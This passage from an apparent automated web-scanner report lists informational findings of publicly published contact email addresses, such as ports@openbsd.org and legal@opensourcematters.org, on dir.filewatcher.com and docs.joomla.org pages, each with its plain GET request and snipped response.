...[SNIP]...

24.45. http://dir.filewatcher.com/d/OpenBSD/3.9/sparc/aub-2.0.5.tgz.32478.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/3.9/sparc/aub-2.0.5.tgz.32478.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/3.9/sparc/aub-2.0.5.tgz.32478.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:00 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "rXctGE9ZuJqH+Fb906+BLQ"
Content-Length: 19463
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 174
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.46. http://dir.filewatcher.com/d/OpenBSD/4.0/alpha/aub-2.0.5.tgz.32474.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.0/alpha/aub-2.0.5.tgz.32474.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/4.0/alpha/aub-2.0.5.tgz.32474.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:45 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "AyywHHTsGb4e3P/0PscWpw"
Content-Length: 22484
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 175
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.47. http://dir.filewatcher.com/d/OpenBSD/4.0/amd64/aub-2.0.5.tgz.32470.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.0/amd64/aub-2.0.5.tgz.32470.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/4.0/amd64/aub-2.0.5.tgz.32470.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:47 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "+T32qb0lEneT8hwdZwNmWQ"
Content-Length: 23043
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 174
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.48. http://dir.filewatcher.com/d/OpenBSD/4.0/m68k/aub-2.0.5.tgz.32479.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.0/m68k/aub-2.0.5.tgz.32479.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/4.0/m68k/aub-2.0.5.tgz.32479.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:51 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "sRJNXt2YnEvJFMxJ8cr0wA"
Content-Length: 22283
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 176
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.49. http://dir.filewatcher.com/d/OpenBSD/4.0/sparc/aub-2.0.5.tgz.32477.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.0/sparc/aub-2.0.5.tgz.32477.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/4.0/sparc/aub-2.0.5.tgz.32477.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:50 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8uwFEp9EFUfqNRxJeVtUQQ"
Content-Length: 22490
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 176
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.50. http://dir.filewatcher.com/d/OpenBSD/4.1/alpha/aub-2.0.5.tgz.32475.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.1/alpha/aub-2.0.5.tgz.32475.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/4.1/alpha/aub-2.0.5.tgz.32475.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:21 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "7VuYOQlGD9x2GFM1KZWiog"
Content-Length: 20401
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.51. http://dir.filewatcher.com/d/OpenBSD/4.1/i386/aub-2.0.5.tgz.32473.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.1/i386/aub-2.0.5.tgz.32473.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/4.1/i386/aub-2.0.5.tgz.32473.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:15 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "wlm683WbAi037RAQWrT8VA"
Content-Length: 22662
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.52. http://dir.filewatcher.com/d/OpenBSD/4.1/mips64/aub-2.0.5.tgz.32471.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.1/mips64/aub-2.0.5.tgz.32471.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/4.1/mips64/aub-2.0.5.tgz.32471.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:19 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IhWg+v1MTAtlwa1SgiETQw"
Content-Length: 22652
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.53. http://dir.filewatcher.com/d/OpenBSD/4.1/sparc/aub-2.0.5.tgz.32480.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.1/sparc/aub-2.0.5.tgz.32480.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/4.1/sparc/aub-2.0.5.tgz.32480.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "X9MgYBFw7AKSbPw/mZFSmA"
Content-Length: 20380
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.54. http://dir.filewatcher.com/d/OpenBSD/4.1/sparc64/aub-2.0.5.tgz.32476.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.1/sparc64/aub-2.0.5.tgz.32476.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/4.1/sparc64/aub-2.0.5.tgz.32476.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:18 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "RJXDg++Gd640m7L2IsOVRA"
Content-Length: 22403
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.55. http://dir.filewatcher.com/d/OpenBSD/4.2/alpha/aub-2.0.5.tgz.32467.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.2/alpha/aub-2.0.5.tgz.32467.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/4.2/alpha/aub-2.0.5.tgz.32467.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:33 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GmLk8R3/tGBN7dqZ5++dSA"
Content-Length: 22328
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 156
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.56. http://dir.filewatcher.com/d/OpenBSD/4.2/amd64/aub-2.0.5.tgz.32461.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.2/amd64/aub-2.0.5.tgz.32461.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/4.2/amd64/aub-2.0.5.tgz.32461.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:38 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "JkFpCgLlVGqsLda3JsK6lQ"
Content-Length: 22721
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 168
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.57. http://dir.filewatcher.com/d/OpenBSD/4.2/i386/aub-2.0.5.tgz.32462.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.2/i386/aub-2.0.5.tgz.32462.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/4.2/i386/aub-2.0.5.tgz.32462.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:40 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "WggwIsm1hyihQhmXNRbroQ"
Content-Length: 22445
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 171
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.58. http://dir.filewatcher.com/d/OpenBSD/4.2/powerpc/aub-2.0.5.tgz.32466.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.2/powerpc/aub-2.0.5.tgz.32466.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/4.2/powerpc/aub-2.0.5.tgz.32466.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:36 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "qnqcNGV6GTGvBfWiVN/i8A"
Content-Length: 22667
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 162
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.59. http://dir.filewatcher.com/d/OpenBSD/4.3/i386/aub-2.0.5.tgz.32459.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.3/i386/aub-2.0.5.tgz.32459.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/4.3/i386/aub-2.0.5.tgz.32459.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:42 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "tT6tidPH7IfBUdKWEEVcmQ"
Content-Length: 22893
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 173
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.60. http://dir.filewatcher.com/d/OpenBSD/snapshots/alpha/aub-2.0.5.tgz.32465.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/snapshots/alpha/aub-2.0.5.tgz.32465.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/snapshots/alpha/aub-2.0.5.tgz.32465.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:57 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "RoWFpfcPc20SwbRr6yBiNw"
Content-Length: 23042
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 172
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.61. http://dir.filewatcher.com/d/Other/src/Applications/Communications/aub-2.0.5-10.src.rpm.82336.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/Other/src/Applications/Communications/aub-2.0.5-10.src.rpm.82336.html

Issue detail

The following email address was disclosed in the response:
  • om@filewatcher.org

Request

GET /d/Other/src/Applications/Communications/aub-2.0.5-10.src.rpm.82336.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:56 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 231
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.62. http://docs.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /

Issue detail

The following email address was disclosed in the response:
  • legal@opensourcematters.org

Request

GET / HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sat, 15 Jan 2011 18:24:51 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<a href="mailto:legal@opensourcematters.org" class="external text" title="mailto:legal@opensourcematters.org" rel="nofollow">legal@opensourcematters.org</a>
...[SNIP]...
<a href="mailto:legal@opensourcematters.org" class="external text" title="mailto:legal@opensourcematters.org" rel="nofollow">legal@opensourcematters.org</a>
...[SNIP]...

24.63. http://docs.joomla.org/Development_Working_Group

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Development_Working_Group

Issue detail

The following email address was disclosed in the response:
  • calendar@joomla.org

Request

GET /Development_Working_Group HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sun, 19 Sep 2010 12:39:23 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
